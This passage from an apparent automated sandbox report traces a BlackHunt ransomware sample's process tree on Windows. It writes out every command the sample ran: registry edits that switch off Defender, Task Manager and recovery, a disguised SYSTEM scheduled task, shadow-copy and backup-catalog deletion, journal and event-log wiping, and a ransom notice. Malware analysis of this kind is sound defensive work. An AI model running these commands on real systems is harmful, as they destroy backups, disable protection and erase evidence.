49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 177 PID 2832 wrote to memory of 5104 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 177 PID 4020 wrote to memory of 4128 4020 cmd.exe 172 PID 4020 wrote to memory of 4128 4020 cmd.exe 172 PID 4968 wrote to memory of 4560 4968 cmd.exe 107 PID 4968 wrote to memory of 4560 4968 cmd.exe 107 PID 2832 wrote to memory of 1840 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 108 PID 2832 wrote to memory of 1840 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 108 PID 2352 wrote to memory of 3060 2352 cmd.exe 174 PID 2352 wrote to memory of 3060 2352 cmd.exe 174 PID 5104 wrote to memory of 2804 5104 cmd.exe 111 PID 5104 wrote to memory of 2804 5104 cmd.exe 111 PID 2832 wrote to memory of 1600 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 112 PID 2832 wrote to memory of 1600 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 112 PID 2832 wrote to memory of 4520 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 114 PID 2832 wrote to memory of 4520 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 114 PID 1840 wrote to memory of 4796 1840 cmd.exe 116 PID 1840 wrote to memory of 4796 1840 cmd.exe 116 PID 2832 wrote to memory of 3272 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 117 PID 2832 wrote to memory of 3272 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 117 PID 2832 wrote to memory of 2776 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 119 PID 2832 wrote to memory of 2776 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 119 PID 2832 wrote to memory of 1704 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 120 PID 2832 wrote to memory of 1704 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 120 PID 1600 wrote to memory of 4908 1600 cmd.exe 184 PID 1600 wrote to memory of 4908 1600 cmd.exe 184 PID 2832 wrote to memory of 1032 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 124 PID 2832 wrote to memory of 1032 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 124 PID 4520 wrote to memory of 1612 4520 cmd.exe 126 PID 4520 wrote to memory of 1612 4520 cmd.exe 126 PID 3272 wrote to memory of 4428 3272 cmd.exe 185 PID 3272 wrote to memory of 4428 3272 cmd.exe 185 PID 2832 wrote to memory of 4524 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 196 PID 2832 wrote to memory of 4524 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 196 PID 2776 wrote to memory of 1520 2776 cmd.exe 130 PID 2776 wrote to memory of 1520 2776 cmd.exe 130 PID 1704 wrote to memory of 2156 1704 cmd.exe 131 PID 1704 wrote to memory of 2156 1704 cmd.exe 131 PID 2832 wrote to memory of 2920 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 133 PID 2832 wrote to memory of 2920 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 133 PID 1032 wrote to memory of 868 1032 cmd.exe 132 PID 1032 wrote to memory of 868 1032 cmd.exe 132 PID 2832 wrote to memory of 3488 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 135 PID 2832 wrote to memory of 3488 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 135 PID 4524 wrote to memory of 4068 4524 reg.exe 137 PID 4524 wrote to memory of 4068 4524 reg.exe 137 PID 2832 wrote to memory of 3196 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 138 PID 2832 wrote to memory of 3196 2832 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe 138 PID 2920 wrote to memory of 1580 2920 cmd.exe 140 PID 2920 wrote to memory of 1580 2920 cmd.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe"C:\Users\Admin\AppData\Local\Temp\49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3196
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1156
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2220
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2176
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:9508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe" /F2⤵
- Adds Run key to start application
PID:3060 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\49fa81efbb72fe5659f7b4e8ac3d75c5edd2b870d45d5eeea7e310c2ecac86e7.exe" /F3⤵
- Creates scheduled task(s)
PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4392
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3652
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4908
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:9476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4428
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:912
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2260
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4440
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1760
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11300
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:8812
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:9548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8116
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:9368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3936
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:12504
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7632
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8888
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9248
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10708
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11124
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:10344
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7444
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8792
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:11152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11060
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10936
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:6044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7096
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:14316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5980
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:13532
-
-
-
